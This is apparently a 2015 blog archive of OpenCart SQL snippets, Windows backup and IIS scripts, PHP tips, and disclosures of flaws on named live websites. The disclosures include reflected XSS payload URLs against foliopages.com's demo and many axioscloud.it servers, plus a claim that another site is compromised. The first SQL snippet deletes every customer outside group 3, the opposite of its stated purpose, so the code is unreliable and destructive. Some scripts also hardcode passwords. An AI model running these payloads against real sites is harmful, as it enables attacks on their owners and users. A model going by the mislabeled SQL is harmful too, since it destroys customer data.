Skip to main content

Posts

Showing posts from September, 2015

Opencart - SQL to Delete customers of a specifi Users Group and move all the customers to the 1st users group

In this example we delete all the customers of the group with ID 3 and move all the other customers to the first group



DELETE FROM oc_customer_activity WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_history WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_ip WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_online WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_reward WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_transaction WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);


DELETE FROM oc_address WHERE customer_id IN (
 SELECT oc_cus…

Opencart - mass update price by percentage, change class id and so on. Simple Sql queries

Opencart disable products with price zero
Sometimes there are products with price zero, or other specific column/value, that need to be disabled.


It's quite easy to update all your products with this sql UPDATE.


    update oc_product set status = 0 where price = 0.0000;

Mass Update the prices of the products in opencart
lowering the price with -22% - For example when you've imported prices including taxes and you want to add a tax class

    update oc_product set price = (price / 1.22);

rising the price with +22% (ex. iva italiana)

    update oc_product set price = (price * 1.22);


Mass Update the tax class of the products in opencart
    update oc_product set tax_class_id = 1;
if you want to remove the class id from all the products

    update oc_product set tax_class_id = 0;

mysql dump and save batch

mysql dump and save with a batch file. It's quite old but works.





SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\mysql.7z"
SET mysqldir=c:\mysql\bin
SET mysqluser=root
SET mysqlpassword=pass
REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"

REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
"%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"



%SEVENPATH% %ADDUP% -ms=off -pfuxedboost -t7z  %SAVEDATA% "%bkdir%\backup.sql"

del "%bkdir%\backup.sql"

IIS Log cleaner (old) method to clean all the IIS logs

IIS Log cleaner






'Determine the number of days for which you want to keep logs
logDelDays = 30

'Main driver
purgeIISLogs("W3SVC")
purgeIISLogs("MSFTPSVC")

'Purge IIS logs
Sub purgeIISlogs(strService)
    delCount   = 0
    Set fso    = CreateObject("Scripting.FileSystemObject")
    Set objIIS = GetObject("IIS://" & getComputer() & "/" & strService)
    For Each objweb in objIIS
        If lCase(objweb.Class) = "iiswebserver" _
        Or lCase(objweb.Class) = "iisftpserver" Then
            fLogDirPath = objweb.LogFileDirectory & "\" & strService & objweb.name
            If fso.FolderExists(fLogDirPath) Then
                For Each fLog in fso.GetFolder(fLogDirPath).Files
                    If UCase(Left(fLog.Name,2)) = "EX" And UCase(Right(fLog.Name,4)) = ".LOG" Then
                        fileDate = cDate(Mid(fLog.name,7,2) & " " & monthname(cin…

Simple script to backup the helm db.

Simple script to backup the helm db. It's quite old and I used it a long time ago.





@echo off


SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\helmdb.7z"
SET mysqldir=c:\mysql\bin
SET mysqlpassword=pass
REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"
SET zippass=pass
REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
REM "%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"

osql -E -S .\Helm -Q "BACKUP DATABASE helmdb TO DISK='%bkdir%\helmdb2.dat'"






if exist %bkdir%\helmdb2.dat goto exist
goto end
:exist
ren "%bkdir%\helmdb2.dat" helmdb.dat
%SEVENPATH% %ADDUP% -ms=off -p%zippass% -t7z  %SAVEDATA% "%bkdir%\helmdb.dat"
del "%bkdir%\helmdb.dat" "%bkdir%\helmdb2.dat"


:end

How to restore permissions in the web folders - script restore permissions webfolders.vbs (old)

How to restore permissions in the web folders - script
restore permissions webfolders.vbs





'-------------------------------------------------------------
' Domains Folders Permissions Rebuild Script
' ============================================================
' Re-adds the permissions for the IIS anonymous users to the
' domains folders
' ------------------------------------------------------------
' Copyright © 2004 Andrew Taylor
' ------------------------------------------------------------
' Usage: Save this script as a .vbs file and run:
'        cscript.exe "c:\PermissionsRebuild.vbs"
' ------------------------------------------------------------
' Enquiries to andy@4dhosting.com
' I disclaim all responsibility for results of this script
' which is run at your own risk
'-------------------------------------------------------------

'-------------------------------------------------------------
' Configuration variable…

old vb script to restore dns on windows server - Do not use on new windows servers

old vb script to restore dns on windows server - Do not use on new windows servers.

 restoredns.vbs





'-------------------------------------------------------------
' Global DNS Rebuild Script
' ~~~~~~~~~~~~~~~~~~~~~~~~~
' Rebuilds your entire DNS structure for all domains in Helm.
' Usefull for when moving servers, changing IPs, or for fixing
' messed up DNS records.
'
' It would be best to delete your DNS zones on your DNS server
' before running, to ensure new DNS zones are brand new!
'
' This script works with multi-server setups, run it on the
' control server!
'
' If you are using the script to change servers, or update IPs
' update all your system settings in the Helm Control Panel,
' then run this script.'
' This also rebuilds global records that ADMIN and RESELLERS
' have added. It gets the entrys the domain's reseller has
' added, then gets the entrys the ADMIN has added.
'
' UPDATED 10/11/2004: Now works…

How to insert an opencart category with SQL only

How to insert an opencart category with SQL only.




I've always set the default store (0).


SET @catname = 'MyCategory';

INSERT INTO `test`.`oc_category` (`category_id`, `image`, `parent_id`, `top`, `column`, `sort_order`, `status`, `date_added`, `date_modified`) VALUES (NULL, '', '0', '0', '1', '0', '1', '2015-09-02 00:00:00', '2015-09-02 00:00:00');
SET @lastinsert = LAST_INSERT_ID();


/*2 insert for  language id 1english and id 2 italian - in my case*/
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '1', @catname, @catname, @catname, @catname, @catname);
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '2', @catname, @catname, @catname, @catname, @catname);
INS…

http://www.foliopages.com/php-photo-gallery-no-database XSS, files informations leakage, directory traversal

http://www.foliopages.com/php-photo-gallery-no-database


Sample XSS
http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California</title><script>alert('http://trueliarx.blogspot.com');</script>

(with multiple pages)

http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California&p=<script>alert('http://trueliarx.blogspot.com');</script>


http://localhost/demo.php?album=frankenstein%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C


Errors

Warning: scandir(albums/Big Bear California</title><script>alert('http://trueliarx.blogspot.com');</script>): failed to open dir: No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: scandir(): (errno 2): No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: Invalid argument supplied for foreach() in /home/foliopag/public_html…

https://www.myfonts.com/ | raising errors - no tests

https://www.myfonts.com/
Error raised by using a specific image that doesn't fit any kind of character. Submit without any value to get the error. That's all.










( ! ) Warning: implode(): Invalid arguments passed in /home/serve_me/www/trunk/include/WhatTheFont/Utils.php on line 24Call Stack#TimeMemoryFunctionLocation10.0000246064{main}( ).../rewrite.php:020.02461993640require( '/home/serve_me/www/trunk/webroot/widgets/wtf/wtf.php' ).../rewrite.php:5230.03003346192require( '/home/serve_me/www/trunk/webroot/widgets/wtf/results.php' ).../wtf.php:1940.04843572104WhatTheFont\WhatTheFont->getFontMatches( ).../results.php:2950.04843572336WhatTheFont\Client->getResult( ).../WhatTheFont.php:19260.04843572336WhatTheFont\Client->attemptConnection( ).../Client.php:22770.05003572872WhatTheFont\Client->getMessage( ).../Client.php:20880.05003573080WhatTheFont\Utils::convertCharacters( ).../Client.php:19590.05003573304implode ( ).../Utils.php:24
( ! ) Warning: i…

How to show PHP errors in the web browser - the php error reporting

When you need to show all the PHP errors in the browsers just use this code

ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(E_ALL);
It should work with any version of PHP to report quite any kind of PHP error while you are debugging your code.

Remember to disable the error reporting when in production.



FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci' - with sql file only

How to FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci'

Why does it happens? The utf8mb4_unicode_ci is supported only on mysql servers 5.5.3+ and you will not be available on older servers. That's all.










The worst solution if you have only an sql file you can TRY to

... COLLATE utf8mb4_unicode_ci
to
utf8_general_ci

but it's NOT SAFE because you can probably have problems with the encoding!!! I've tested and it also works but really don't know if there can be consequences.


The best solution
Export from the original database in utf8_general_ci or, if you just have the sql, Import your data in a newer mysql server (5.5.3+) and export again with utf8_general_ci!


Another way to do it
If you want to operate on a live database run this sql for each table.

ALTER TABLE name-of-table CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci

Sample (crappy) php code


<?php $dbuser = 'test2'; $dbpassword = 'test2'; $dbhost = 'l…

how to use owncloud on windows server

Even if it's not suggested you can run ownlcoud scripts on your local windows server

go in /lib/private/util.php
and comment or remove near line 581:

/*
        if(OC_Util::runningOnWindows()) {
            $errors[] = [
                'error' => $l->t('Microsoft Windows Platform is not supported'),
                'hint' => $l->t('Running ownCloud Server on the Microsoft Windows platform is not supported. We suggest you ' .
                    'use a Linux server in a virtual machine if you have no option for migrating the server itself. ' .
                    'Find Linux packages as well as easy to deploy virtual machine images on <a href="%s">%s</a>. ' .
                    'For migrating existing installations to Linux you can find some tips and a migration script ' .
                    'in <a href="%s">our documentation</a>.',
                    ['https://ownc…

axioscloud.it | xss, system compromise

There are too many server/sites in this case. Append that string:
<video src=1 onerror=alert('testamento')>
From server
https://re1.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=
to (change the initial RE part with nr) server
https://re35.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=

https://redemo.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=





www.sissiweb.it - the system is already compromised - win